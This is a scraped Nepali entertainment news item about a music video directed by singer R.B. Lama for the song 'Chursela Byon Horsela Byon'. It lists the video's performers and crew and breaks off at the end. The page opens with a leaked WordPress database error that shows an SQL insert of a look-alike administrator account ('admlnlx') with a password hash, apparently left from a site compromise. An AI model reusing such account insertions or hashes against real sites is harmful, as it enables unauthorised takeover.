WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5SHwmezaYh4w0sNUUVjo1hw7bQ..H.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-26 20:54:54', '', 'admlnlx', 'admlnlx')
काठमाडौँ । चर्चित संगीतकार एंव गायक आर बि लामा ‘चुर्सेला ब्योन होर्सेला ब्योन’ बोलको गीतबाट म्युजिक भिडियोको निर्देशनमा लागेका छन ।
जिग्मे मिडियाको अफिसियल युटुब च्यानलबाट गीतलाई बजारमा ल्याएको हो ।
गीतमा गायक पूर्ण लामा र गायिका जितु लोप्चनको आवाज, दिपेश प्रधानको मिक्सिङ रहेको छ भने गायक लामाको शब्द रहेको छ ।
राम कुमार केसीले छायांकन गरेको भिडियोलाई देवराज गुरुङले कोरियोग्राफी, टेकेन्द्र शाहले सम्पादन गरेका हुन ।
भिडियोमा पुसन लामा, सरोज तामाङ, रमन तामाङ र अनुस्का दोङ तामाङको अभिनय रहेको छ ।
भिडियो